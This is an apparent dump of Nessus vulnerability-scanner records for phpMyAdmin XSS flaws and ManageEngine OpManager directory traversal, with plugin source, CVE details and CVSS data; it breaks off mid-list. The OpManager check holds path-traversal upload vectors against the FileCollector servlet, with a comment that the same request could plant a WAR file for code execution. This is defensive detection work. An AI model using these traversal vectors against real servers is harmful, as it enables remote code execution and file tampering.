\"CVE-2014-4987\"\n );\n script_bugtraq_id(\n 68798,\n 68799,\n 68803,\n 68804\n );\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin install\nhosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x\nprior to 4.1.14.2, or 4.2.x prior to 4.2.6. It is, therefore, affected\nby the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being\n validated in the script 'libraries/structure.lib.php'\n and could allow cross-site scripting attacks. Note that\n this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in\n the script 'libraries/rte/rte_list.lib.php' and could\n allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are\n not being validated in the scripts 'js/functions.js'\n and 'js/tbl_structure.js' respectively and could allow\n cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error\n that could allow a remote attacker to obtain the MySQL\n user list and possibly make changes to the application\n display. Note this issue only affects the 4.1.x and\n 4.2.x branches. (CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://sourceforge.net/p/phpmyadmin/news/2014/07/phpmyadmin-40101-41142-and-426-are-released/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b66a58c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/57475371a5b515c83bfc1bb2efcdf3ddb14787ed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91815216\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/10014d4dc596b9e3a491bf04f3e708cf1887d5e1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8cdbf2d1\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/511c596b175889b8e6b9c423e352ca64fa20af2b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1aafba98\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/1b5592435617fa1b9dd68e2dc263de64c69fdc8a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?67967469\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3bfc267\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/cd5697027a2ee7e1f7d7000b23be6051cdb0516c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97997036\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/a92753bd65e1f8b72c46ed3dda6c362628e0daf7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79fdaa0b\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/395265e9937beb21134626c01a21f44b28e712e5\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7abe0a00\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/45550b8cff06ad128129020762f9b53d125a6934\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55cf9587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.0.10.1 / 4.1.14.2 / 4.2.6 or later, or\napply the patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-4987\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, \"phpMyAdmin 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.1\n# 4.1.x < 4.1.14.2\n# 4.2.x < 4.2.6\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.1';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.2';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.6';\n}\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:28", "description": "Versions of phpMyAdmin earlier than 4.0.10.1, 4.1.14.2, or 4.2.6 are unpatched for the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being validated in the script 'libraries/structure.lib.php' and could allow cross-site scripting attacks. Note that this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in the script 'libraries/rte/rte_list.lib.php' and could allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are not being validated in the scripts 'js/functions.js' and 'js/tbl_structure.js' respectively and could allow cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error that could allow a remote attacker to obtain the MySQL user list and possibly make changes to the application display. Note this issue only affects the 4.1.x and 4.2.x branches. (CVE-2014-4987)", "cvss3": {"score": 5.4, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 through PMASA-2014-7)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987", "CVE-2014-4954"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8377.PRM", "href": "https://www.tenable.com/plugins/nnm/8377", "sourceData": "Binary data 8377.prm", "cvss": {"score": 5.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-08-19T12:49:03", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it is possible to trigger an XSS in database structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it is possible to trigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unpriviledged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-20T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3F09CA290E4811E4B17A6805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/76600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76600);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it is possible to trigger an XSS in\ndatabase structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it is possible to\ntrigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when\ndropping the column in table structure page. With a crafted table name\nit is possible to trigger an XSS when dropping or truncating the table\nin table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unpriviledged user could view the MySQL user list and manipulate\nthe tabs displayed in phpMyAdmin for them.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-4/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\"\n );\n # https://vuxml.freebsd.org/freebsd/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e5f4d0b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:49:07", "description": "Multiple vulnerabilities has been discovered and corrected in phpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the PMA_getHtmlForActionLinks function in libraries/structure.lib.php in phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted table comment that is improperly handled during construction of a database structure page (CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted trigger name that is improperly handled on the database triggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message (CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address these vulnerabilities.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-143.NASL", "href": "https://www.tenable.com/plugins/nessus/76924", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:143. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76924);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n script_bugtraq_id(68798, 68799, 68803, 68804);\n script_xref(name:\"MDVSA\", value:\"2014:143\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\nphpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the\nPMA_getHtmlForActionLinks function in libraries/structure.lib.php in\nphpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\ninject arbitrary web script or HTML via a crafted table comment that\nis improperly handled during construction of a database structure page\n(CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\nfunction in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\n4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\nauthenticated users to inject arbitrary web script or HTML via a\ncrafted trigger name that is improperly handled on the database\ntriggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js\nin phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\nbefore 4.2.6 allow remote authenticated users to inject arbitrary web\nscript or HTML via a crafted (1) table name or (2) column name that is\nimproperly handled during construction of an AJAX confirmation message\n(CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\nbefore 4.2.6 allows remote authenticated users to bypass intended\naccess restrictions and read the MySQL user list via a viewUsers\nrequest (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address\nthese vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/phpmyadmin/news/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.6-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:46:50", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/nessus/81378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d44b4150\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6035\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n 